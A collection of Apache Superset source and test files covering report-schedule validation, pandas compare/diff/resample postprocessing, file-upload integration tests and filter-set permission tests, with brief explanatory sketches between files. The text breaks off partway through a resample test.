from marshmallow import ValidationError
from superset.charts.dao import ChartDAO
from superset.commands.base import BaseCommand
from superset.dashboards.dao import DashboardDAO
from superset.models.reports import ReportCreationMethodType
from superset.reports.commands.exceptions import (
ChartNotFoundValidationError,
ChartNotSavedValidationError,
DashboardNotFoundValidationError,
DashboardNotSavedValidationError,
ReportScheduleChartOrDashboardValidationError,
)
logger = logging.getLogger(__name__)
class BaseReportScheduleCommand(BaseCommand):
_properties: Dict[str, Any]
def run(self) -> Any:
pass
def validate(self) -> None:
pass
def validate_chart_dashboard(
self, exceptions: List[ValidationError], update: bool = False
) -> None:
"""Validate chart or dashboard relation"""
chart_id = self._properties.get("chart")
dashboard_id = self._properties.get("dashboard")
creation_method = self._properties.get("creation_method")
if creation_method == ReportCreationMethodType.CHARTS and not chart_id:
# User has not saved chart yet in Explore view
exceptions.append(ChartNotSavedValidationError())
return
if creation_method == ReportCreationMethodType.DASHBOARDS and not dashboard_id:
exceptions.append(DashboardNotSavedValidationError())
return
if chart_id and dashboard_id:
exceptions.append(ReportScheduleChartOrDashboardValidationError())
if chart_id:
chart = ChartDAO.find_by_id(chart_id)
if not chart:
exceptions.append(ChartNotFoundValidationError())
self._properties["chart"] = chart
elif dashboard_id:
dashboard = DashboardDAO.find_by_id(dashboard_id)
if not dashboard:
exceptions.append(DashboardNotFoundValidationError())
self._properties["dashboard"] = dashboard
elif not update:
exceptions.append(ReportScheduleChartOrDashboardValidationError())
```
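`validate_chart_dashboard` appends errors to a caller-supplied list instead of raising immediately, so several problems can be reported in one response. A minimal, framework-free sketch of that accumulate-then-raise pattern (the error class and inputs are made up, not Superset's):
```python
from typing import List, Optional

class ValidationIssue(Exception):
    """Hypothetical stand-in for the ValidationError subclasses used above."""

def validate(chart_id: Optional[int], dashboard_id: Optional[int]) -> None:
    exceptions: List[ValidationIssue] = []
    if chart_id and dashboard_id:
        exceptions.append(ValidationIssue("pick a chart or a dashboard, not both"))
    if not chart_id and not dashboard_id:
        exceptions.append(ValidationIssue("a chart or a dashboard is required"))
    if exceptions:
        # The real command wraps the collected errors in a single "invalid" error.
        raise ValidationIssue("; ".join(str(e) for e in exceptions))

validate(chart_id=1, dashboard_id=None)  # passes silently
try:
    validate(chart_id=None, dashboard_id=None)
except ValidationIssue as err:
    print(err)  # a chart or a dashboard is required
```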
#### File: utils/pandas_postprocessing/compare.py
```python
from typing import List, Optional
import pandas as pd
from flask_babel import gettext as _
from pandas import DataFrame
from superset.constants import PandasPostprocessingCompare
from superset.exceptions import InvalidPostProcessingError
from superset.utils.core import TIME_COMPARISON
from superset.utils.pandas_postprocessing.utils import validate_column_args
@validate_column_args("source_columns", "compare_columns")
def compare( # pylint: disable=too-many-arguments
df: DataFrame,
source_columns: List[str],
compare_columns: List[str],
compare_type: PandasPostprocessingCompare,
drop_original_columns: Optional[bool] = False,
precision: Optional[int] = 4,
) -> DataFrame:
"""
    Calculate column-by-column changes for selected columns.
:param df: DataFrame on which the compare will be based.
:param source_columns: Main query columns
:param compare_columns: Columns being compared
    :param compare_type: Type of compare. Choice of `difference`, `percentage` or `ratio`
:param drop_original_columns: Whether to remove the source columns and
compare columns.
:param precision: Round a change rate to a variable number of decimal places.
:return: DataFrame with compared columns.
    :raises InvalidPostProcessingError: If the request is incorrect.
"""
if len(source_columns) != len(compare_columns):
raise InvalidPostProcessingError(
_("`compare_columns` must have the same length as `source_columns`.")
)
if compare_type not in tuple(PandasPostprocessingCompare):
raise InvalidPostProcessingError(
_("`compare_type` must be `difference`, `percentage` or `ratio`")
)
if len(source_columns) == 0:
return df
for s_col, c_col in zip(source_columns, compare_columns):
s_df = df.loc[:, [s_col]]
s_df.rename(columns={s_col: "__intermediate"}, inplace=True)
c_df = df.loc[:, [c_col]]
c_df.rename(columns={c_col: "__intermediate"}, inplace=True)
if compare_type == PandasPostprocessingCompare.DIFF:
diff_df = s_df - c_df
elif compare_type == PandasPostprocessingCompare.PCT:
diff_df = ((s_df - c_df) / c_df).astype(float).round(precision)
else:
# compare_type == "ratio"
diff_df = (s_df / c_df).astype(float).round(precision)
diff_df.rename(
columns={
"__intermediate": TIME_COMPARISON.join([compare_type, s_col, c_col])
},
inplace=True,
)
df = pd.concat([df, diff_df], axis=1)
if drop_original_columns:
df = df.drop(source_columns + compare_columns, axis=1)
return df
```
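For a quick sense of the output, the sketch below reproduces the percentage branch with plain pandas instead of calling Superset's `compare`; column names and numbers are invented, and the real function builds the result column name with the `TIME_COMPARISON` separator.
```python
import pandas as pd

df = pd.DataFrame(
    {"sales": [100.0, 200.0, 300.0], "sales_prev": [80.0, 250.0, 300.0]}
)

# Mirrors the PandasPostprocessingCompare.PCT branch: (source - compare) / compare
df["pct__sales__sales_prev"] = (
    (df["sales"] - df["sales_prev"]) / df["sales_prev"]
).round(4)
print(df)
#    sales  sales_prev  pct__sales__sales_prev
# 0  100.0        80.0                    0.25
# 1  200.0       250.0                   -0.20
# 2  300.0       300.0                    0.00
```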
#### File: utils/pandas_postprocessing/diff.py
```python
from typing import Dict
from pandas import DataFrame
from superset.constants import PandasAxis
from superset.utils.pandas_postprocessing.utils import (
_append_columns,
validate_column_args,
)
@validate_column_args("columns")
def diff(
df: DataFrame,
columns: Dict[str, str],
periods: int = 1,
axis: PandasAxis = PandasAxis.ROW,
) -> DataFrame:
"""
Calculate row-by-row or column-by-column difference for select columns.
:param df: DataFrame on which the diff will be based.
:param columns: columns on which to perform diff, mapping source column to
target column. For instance, `{'y': 'y'}` will replace the column `y` with
the diff value in `y`, while `{'y': 'y2'}` will add a column `y2` based
on diff values calculated from `y`, leaving the original column `y`
unchanged.
:param periods: periods to shift for calculating difference.
:param axis: 0 for row, 1 for column. default 0.
:return: DataFrame with diffed columns
    :raises InvalidPostProcessingError: If the request is incorrect
"""
df_diff = df[columns.keys()]
df_diff = df_diff.diff(periods=periods, axis=axis)
return _append_columns(df, df_diff, columns)
```
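`diff` is a thin wrapper over `DataFrame.diff` limited to the selected columns, with the result re-attached through `_append_columns`. The underlying pandas call behaves like this (toy data):
```python
import pandas as pd

df = pd.DataFrame({"y": [1.0, 3.0, 6.0, 10.0]})

# periods=1, axis=0 is the default used above: each row minus the previous row.
print(df[["y"]].diff(periods=1, axis=0))
#      y
# 0  NaN
# 1  2.0
# 2  3.0
# 3  4.0
```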
#### File: data_loading/data_definitions/types.py
```python
from abc import ABC, abstractmethod
from dataclasses import dataclass
from typing import Any, Dict, Iterable, Optional
from sqlalchemy.types import TypeEngine
@dataclass
class TableMetaData:
table_name: str
types: Optional[Dict[str, TypeEngine]]
@dataclass
class Table:
table_name: str
table_metadata: TableMetaData
data: Iterable[Dict[Any, Any]]
class TableMetaDataFactory(ABC):
@abstractmethod
def make(self) -> TableMetaData:
...
def make_table(self, data: Iterable[Dict[Any, Any]]) -> Table:
metadata = self.make()
return Table(metadata.table_name, metadata, data)
```
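A concrete factory only has to implement `make()`; the inherited `make_table` then pairs that metadata with a data iterable. The sketch below re-declares minimal stand-ins for the two dataclasses so it runs without the test package on the path; the table name and columns are invented.
```python
from dataclasses import dataclass
from typing import Any, Dict, Iterable, Optional

from sqlalchemy import Integer, String
from sqlalchemy.types import TypeEngine

@dataclass
class TableMetaData:  # stand-in mirroring the definition above
    table_name: str
    types: Optional[Dict[str, TypeEngine]]

@dataclass
class Table:  # stand-in mirroring the definition above
    table_name: str
    table_metadata: TableMetaData
    data: Iterable[Dict[Any, Any]]

class BirthNamesMetaDataFactory:
    """Hypothetical factory: returns metadata for a made-up table."""
    def make(self) -> TableMetaData:
        return TableMetaData("birth_names", {"name": String(255), "num": Integer()})

    def make_table(self, data: Iterable[Dict[Any, Any]]) -> Table:
        metadata = self.make()
        return Table(metadata.table_name, metadata, data)

table = BirthNamesMetaDataFactory().make_table([{"name": "Ada", "num": 10}])
print(table.table_name, list(table.data))
```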
#### File: tests/integration_tests/csv_upload_tests.py
```python
import json
import logging
import os
import shutil
from typing import Dict, Optional
from unittest import mock
import pandas as pd
import pytest
import superset.utils.database
from superset.sql_parse import Table
from superset import security_manager
from tests.integration_tests.conftest import ADMIN_SCHEMA_NAME
from tests.integration_tests.test_app import app # isort:skip
from superset import db
from superset.models.core import Database
from superset.utils import core as utils
from tests.integration_tests.base_tests import get_resp, login, SupersetTestCase
logger = logging.getLogger(__name__)
test_client = app.test_client()
CSV_UPLOAD_DATABASE = "csv_explore_db"
CSV_FILENAME1 = "testCSV1.csv"
CSV_FILENAME2 = "testCSV2.csv"
EXCEL_FILENAME = "testExcel.xlsx"
PARQUET_FILENAME1 = "testZip/testParquet1.parquet"
PARQUET_FILENAME2 = "testZip/testParquet2.parquet"
ZIP_DIRNAME = "testZip"
ZIP_FILENAME = "testZip.zip"
EXCEL_UPLOAD_TABLE = "excel_upload"
CSV_UPLOAD_TABLE = "csv_upload"
PARQUET_UPLOAD_TABLE = "parquet_upload"
CSV_UPLOAD_TABLE_W_SCHEMA = "csv_upload_w_schema"
CSV_UPLOAD_TABLE_W_EXPLORE = "csv_upload_w_explore"
@pytest.fixture(scope="module")
def setup_csv_upload():
with app.app_context():
login(test_client, username="admin")
upload_db = superset.utils.database.get_or_create_db(
CSV_UPLOAD_DATABASE, app.config["SQLALCHEMY_EXAMPLES_URI"]
)
extra = upload_db.get_extra()
extra["explore_database_id"] = superset.utils.database.get_example_database().id
upload_db.extra = json.dumps(extra)
upload_db.allow_file_upload = True
db.session.commit()
yield
upload_db = get_upload_db()
engine = upload_db.get_sqla_engine()
engine.execute(f"DROP TABLE IF EXISTS {EXCEL_UPLOAD_TABLE}")
engine.execute(f"DROP TABLE IF EXISTS {CSV_UPLOAD_TABLE}")
engine.execute(f"DROP TABLE IF EXISTS {PARQUET_UPLOAD_TABLE}")
engine.execute(f"DROP TABLE IF EXISTS {CSV_UPLOAD_TABLE_W_SCHEMA}")
engine.execute(f"DROP TABLE IF EXISTS {CSV_UPLOAD_TABLE_W_EXPLORE}")
db.session.delete(upload_db)
db.session.commit()
@pytest.fixture(scope="module")
def create_csv_files():
with open(CSV_FILENAME1, "w+") as test_file:
for line in ["a,b", "john,1", "paul,2"]:
test_file.write(f"{line}\n")
with open(CSV_FILENAME2, "w+") as test_file:
for line in ["b,c,d", "john,1,x", "paul,2,"]:
test_file.write(f"{line}\n")
yield
os.remove(CSV_FILENAME1)
os.remove(CSV_FILENAME2)
@pytest.fixture()
def create_excel_files():
pd.DataFrame({"a": ["john", "paul"], "b": [1, 2]}).to_excel(EXCEL_FILENAME)
yield
os.remove(EXCEL_FILENAME)
@pytest.fixture()
def create_columnar_files():
os.mkdir(ZIP_DIRNAME)
pd.DataFrame({"a": ["john", "paul"], "b": [1, 2]}).to_parquet(PARQUET_FILENAME1)
pd.DataFrame({"a": ["max", "bob"], "b": [3, 4]}).to_parquet(PARQUET_FILENAME2)
shutil.make_archive(ZIP_DIRNAME, "zip", ZIP_DIRNAME)
yield
os.remove(ZIP_FILENAME)
shutil.rmtree(ZIP_DIRNAME)
def get_upload_db():
return db.session.query(Database).filter_by(database_name=CSV_UPLOAD_DATABASE).one()
def upload_csv(filename: str, table_name: str, extra: Optional[Dict[str, str]] = None):
csv_upload_db_id = get_upload_db().id
schema = utils.get_example_default_schema()
form_data = {
"csv_file": open(filename, "rb"),
"sep": ",",
"name": table_name,
"con": csv_upload_db_id,
"if_exists": "fail",
"index_label": "test_label",
"mangle_dupe_cols": False,
}
if schema:
form_data["schema"] = schema
if extra:
form_data.update(extra)
return get_resp(test_client, "/csvtodatabaseview/form", data=form_data)
def upload_excel(
filename: str, table_name: str, extra: Optional[Dict[str, str]] = None
):
excel_upload_db_id = get_upload_db().id
schema = utils.get_example_default_schema()
form_data = {
"excel_file": open(filename, "rb"),
"name": table_name,
"con": excel_upload_db_id,
"sheet_name": "Sheet1",
"if_exists": "fail",
"index_label": "test_label",
"mangle_dupe_cols": False,
}
if schema:
form_data["schema"] = schema
if extra:
form_data.update(extra)
return get_resp(test_client, "/exceltodatabaseview/form", data=form_data)
def upload_columnar(
filename: str, table_name: str, extra: Optional[Dict[str, str]] = None
):
columnar_upload_db_id = get_upload_db().id
schema = utils.get_example_default_schema()
form_data = {
"columnar_file": open(filename, "rb"),
"name": table_name,
"con": columnar_upload_db_id,
"if_exists": "fail",
"index_label": "test_label",
}
if schema:
form_data["schema"] = schema
if extra:
form_data.update(extra)
return get_resp(test_client, "/columnartodatabaseview/form", data=form_data)
def mock_upload_to_s3(filename: str, upload_prefix: str, table: Table) -> str:
"""
    HDFS is used instead of S3 for the integration tests.
:param filename: The file to upload
:param upload_prefix: The S3 prefix
:param table: The table that will be created
:returns: The HDFS path to the directory with external table files
"""
# only needed for the hive tests
import docker
client = docker.from_env()
container = client.containers.get("namenode")
# docker mounted volume that contains csv uploads
src = os.path.join("/tmp/superset_uploads", os.path.basename(filename))
# hdfs destination for the external tables
dest_dir = os.path.join("/tmp/external/superset_uploads/", str(table))
container.exec_run(f"hdfs dfs -mkdir -p {dest_dir}")
dest = os.path.join(dest_dir, os.path.basename(filename))
container.exec_run(f"hdfs dfs -put {src} {dest}")
    # hive external table expects a directory for the location
return dest_dir
```
#### File: dashboards/filter_sets/update_api_tests.py
```python
from __future__ import annotations
import json
from typing import Any, Dict, List, TYPE_CHECKING
from superset.dashboards.filter_sets.consts import (
DESCRIPTION_FIELD,
JSON_METADATA_FIELD,
NAME_FIELD,
OWNER_TYPE_FIELD,
PARAMS_PROPERTY,
)
from tests.integration_tests.base_tests import login
from tests.integration_tests.dashboards.filter_sets.consts import (
DASHBOARD_OWNER_USERNAME,
FILTER_SET_OWNER_USERNAME,
REGULAR_USER,
)
from tests.integration_tests.dashboards.filter_sets.utils import (
call_update_filter_set,
collect_all_ids,
get_filter_set_by_name,
)
if TYPE_CHECKING:
from flask.testing import FlaskClient
from superset.models.filter_set import FilterSet
def merge_two_filter_set_dict(
first: Dict[Any, Any], second: Dict[Any, Any]
) -> Dict[Any, Any]:
for d in [first, second]:
if JSON_METADATA_FIELD in d:
if PARAMS_PROPERTY not in d:
d.setdefault(PARAMS_PROPERTY, json.loads(d[JSON_METADATA_FIELD]))
d.pop(JSON_METADATA_FIELD)
return {**first, **second}
def assert_filterset_was_not_updated(filter_set_dict: Dict[str, Any]) -> None:
assert filter_set_dict == get_filter_set_by_name(filter_set_dict["name"]).to_dict()
def assert_filterset_updated(
filter_set_dict_before: Dict[str, Any], data_updated: Dict[str, Any]
) -> None:
expected_data = merge_two_filter_set_dict(filter_set_dict_before, data_updated)
assert expected_data == get_filter_set_by_name(expected_data["name"]).to_dict()
class TestUpdateFilterSet:
def test_with_dashboard_exists_filterset_not_exists__404(
self,
dashboard_id: int,
filtersets: Dict[str, List[FilterSet]],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
filter_set_id = max(collect_all_ids(filtersets)) + 1
response = call_update_filter_set(
client, {"id": filter_set_id}, {}, dashboard_id
)
# assert
assert response.status_code == 404
def test_with_dashboard_not_exists_filterset_not_exists__404(
self,
not_exists_dashboard_id: int,
filtersets: Dict[str, List[FilterSet]],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
filter_set_id = max(collect_all_ids(filtersets)) + 1
response = call_update_filter_set(
client, {"id": filter_set_id}, {}, not_exists_dashboard_id
)
# assert
assert response.status_code == 404
def test_with_dashboard_not_exists_filterset_exists__404(
self,
not_exists_dashboard_id: int,
dashboard_based_filter_set_dict: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, {}, not_exists_dashboard_id
)
# assert
assert response.status_code == 404
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_with_extra_field__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update["extra"] = "val"
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert response.json["message"]["extra"][0] == "Unknown field."
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_with_id_field__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update["id"] = 1
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert response.json["message"]["id"][0] == "Unknown field."
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_with_none_name__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update[NAME_FIELD] = None
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_with_int_as_name__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update[NAME_FIELD] = 4
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_without_name__200(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update.pop(NAME_FIELD, None)
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 200
assert_filterset_updated(
dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
def test_with_none_description__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update[DESCRIPTION_FIELD] = None
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_with_int_as_description__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update[DESCRIPTION_FIELD] = 1
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_without_description__200(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update.pop(DESCRIPTION_FIELD, None)
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 200
assert_filterset_updated(
dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
def test_with_invalid_json_metadata__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update[DESCRIPTION_FIELD] = {}
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_with_json_metadata__200(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
valid_json_metadata: Dict[Any, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_json_metadata["nativeFilters"] = {"changed": "changed"}
valid_filter_set_data_for_update[JSON_METADATA_FIELD] = json.dumps(
valid_json_metadata
)
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 200
assert_filterset_updated(
dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
def test_with_invalid_owner_type__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update[OWNER_TYPE_FIELD] = "OTHER_TYPE"
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_with_user_owner_type__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update[OWNER_TYPE_FIELD] = "User"
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_with_dashboard_owner_type__200(
self,
user_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update[OWNER_TYPE_FIELD] = "Dashboard"
# act
response = call_update_filter_set(
client, user_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 200
user_based_filter_set_dict["owner_id"] = user_based_filter_set_dict[
"dashboard_id"
]
assert_filterset_updated(
user_based_filter_set_dict, valid_filter_set_data_for_update
)
def test_when_caller_is_admin_and_owner_type_is_user__200(
self,
test_users: Dict[str, int],
user_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
# act
response = call_update_filter_set(
client, user_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 200
assert_filterset_updated(
user_based_filter_set_dict, valid_filter_set_data_for_update
)
def test_when_caller_is_admin_and_owner_type_is_dashboard__200(
self,
test_users: Dict[str, int],
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 200
assert_filterset_updated(
dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
def test_when_caller_is_dashboard_owner_and_owner_is_other_user_403(
self,
test_users: Dict[str, int],
user_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, DASHBOARD_OWNER_USERNAME)
# act
response = call_update_filter_set(
client, user_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 403
assert_filterset_was_not_updated(user_based_filter_set_dict)
def test_when_caller_is_dashboard_owner_and_owner_type_is_dashboard__200(
self,
test_users: Dict[str, int],
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, DASHBOARD_OWNER_USERNAME)
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 200
assert_filterset_updated(
dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
def test_when_caller_is_filterset_owner__200(
self,
test_users: Dict[str, int],
user_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, FILTER_SET_OWNER_USERNAME)
# act
response = call_update_filter_set(
client, user_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 200
assert_filterset_updated(
user_based_filter_set_dict, valid_filter_set_data_for_update
)
def test_when_caller_is_regular_user_and_owner_type_is_user__403(
self,
test_users: Dict[str, int],
user_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, REGULAR_USER)
# act
response = call_update_filter_set(
client, user_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 403
assert_filterset_was_not_updated(user_based_filter_set_dict)
def test_when_caller_is_regular_user_and_owner_type_is_dashboard__403(
self,
test_users: Dict[str, int],
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, REGULAR_USER)
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 403
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
```
#### File: integration_tests/fixtures/unicode_dashboard.py
```python
import pandas as pd
import pytest
from sqlalchemy import String
from superset import db
from superset.connectors.sqla.models import SqlaTable
from superset.models.dashboard import Dashboard
from superset.models.slice import Slice
from superset.utils.core import get_example_default_schema
from superset.utils.database import get_example_database
from tests.integration_tests.dashboard_utils import (
create_dashboard,
create_slice,
create_table_metadata,
)
from tests.integration_tests.test_app import app
UNICODE_TBL_NAME = "unicode_test"
@pytest.fixture(scope="session")
def load_unicode_data():
with app.app_context():
_get_dataframe().to_sql(
UNICODE_TBL_NAME,
get_example_database().get_sqla_engine(),
if_exists="replace",
chunksize=500,
dtype={"phrase": String(500)},
index=False,
method="multi",
schema=get_example_default_schema(),
)
yield
with app.app_context():
engine = get_example_database().get_sqla_engine()
engine.execute("DROP TABLE IF EXISTS unicode_test")
@pytest.fixture()
def load_unicode_dashboard_with_slice(load_unicode_data):
slice_name = "Unicode Cloud"
with app.app_context():
dash = _create_unicode_dashboard(slice_name, None)
yield
_cleanup(dash, slice_name)
@pytest.fixture()
def load_unicode_dashboard_with_position(load_unicode_data):
slice_name = "Unicode Cloud"
position = "{}"
with app.app_context():
dash = _create_unicode_dashboard(slice_name, position)
yield
_cleanup(dash, slice_name)
def _get_dataframe():
data = _get_unicode_data()
return pd.DataFrame.from_dict(data)
def _get_unicode_data():
return [
{"phrase": "Под"},
{"phrase": "řšž"},
{"phrase": "視野無限廣"},
{"phrase": "微風"},
{"phrase": "中国智造"},
{"phrase": "æøå"},
{"phrase": "ëœéè"},
{"phrase": "いろはにほ"},
]
def _create_unicode_dashboard(slice_title: str, position: str) -> Dashboard:
table = create_table_metadata(UNICODE_TBL_NAME, get_example_database())
table.fetch_metadata()
if slice_title:
slice = _create_and_commit_unicode_slice(table, slice_title)
return create_dashboard("unicode-test", "Unicode Test", position, [slice])
def _create_and_commit_unicode_slice(table: SqlaTable, title: str):
slice = create_slice(title, "word_cloud", table, {})
o = db.session.query(Slice).filter_by(slice_name=slice.slice_name).one_or_none()
if o:
db.session.delete(o)
db.session.add(slice)
db.session.commit()
return slice
def _cleanup(dash: Dashboard, slice_name: str) -> None:
db.session.delete(dash)
if slice_name:
slice = db.session.query(Slice).filter_by(slice_name=slice_name).one_or_none()
db.session.delete(slice)
db.session.commit()
```
#### File: unit_tests/pandas_postprocessing/test_resample.py
```python
import numpy as np
import pandas as pd
import pytest
from pandas import to_datetime
from superset.exceptions import InvalidPostProcessingError
from superset.utils import pandas_postprocessing as pp
from tests.unit_tests.fixtures.dataframes import categories_df, timeseries_df
def test_resample_should_not_side_effect():
_timeseries_df = timeseries_df.copy()
pp.resample(df=_timeseries_df, rule="1D", method="ffill")
assert _timeseries_df.equals(timeseries_df)
def test_resample():
post_df = pp.resample(df=timeseries_df, rule="1D", method="ffill")
"""
label y
2019-01-01 x 1.0
2019-01-02 y 2.0
2019-01-03 y 2.0
2019-01-04 y 2.0
2019-01-05 z 3.0
2019-01-06 z 3.0
2019-01-07 q 4.0
"""
assert post_df.equals(
pd.DataFrame(
index=pd.to_datetime(
[
"2019-01-01",
"2019-01-02",
"2019-01-03",
"2019-01-04",
"2019-01-05",
"2019-01-06",
"2019-01-07",
]
),
data={
"label": ["x", "y", "y", "y", "z", "z", "q"],
"y": [1.0, 2.0, 2.0, 2.0, 3.0, 3.0, 4.0],
},
)
)
def test_resample_zero_fill():
post_df = pp.resample(df=timeseries_df, rule="1D", method="asfreq", fill_value=0)
assert post_df.equals(
pd.DataFrame(
index=pd.to_datetime(
[
"2019-01-01",
"2019-01-02",
"2019-01-03",
"2019-01-04",
"2019-01-05",
"2019-01-06",
"2019-01-07",
]
),
data={
"label": ["x", "y", 0, 0, "z", 0, "q"],
"y": [1.0, 2.0, 0, 0, 3.0, 0, 4.0],
},
)
)
def test_resample_after_pivot():
df = pd.DataFrame(
data={
"__timestamp": pd.to_datetime(
[
"2022-01-13",
"2022-01-13",
"2022-01-13",
"2022-01-11",
"2022-01-11",
"2022-01-11",
]
),
"city": ["Chicago", "LA", "NY", "Chicago", "LA", "NY"],
"val": [6.0, 5.0, 4.0, 3.0, 2.0, 1.0],
}
)
pivot_df = pp.pivot(
df=df,
index=["__timestamp"],
columns=["city"],
aggregates={
"val": {"operator": "sum"},
},
flatten_columns=False,
reset_index=False,
)
"""
val
city Chicago LA NY
__timestamp
2022-01-11 3.0 2.0 1.0
2022-01-13 6.0 5.0 4.0
"""
resample_df = pp.resample(
df=pivot_df,
rule="1D",
method="asfreq",
fill_value=0,
)
"""
val
city Chicago LA NY
__timestamp
2022-01-11 3.0 2.0 1.0
2022-01-12 0.0 0.0 0.0
2022-01-13 6.0 5.0 4.0
"""
flat_df = pp.flatten(resample_df)
"""
__timestamp val, Chicago val, LA val, NY
0 2022-01-11 3.0 2.0 1.0
1 2022-01-12 0.0 0.0 0.0
2 2022-01-13 6.0 5.0 4.0
"""
assert flat_df.equals(
pd.DataFrame(
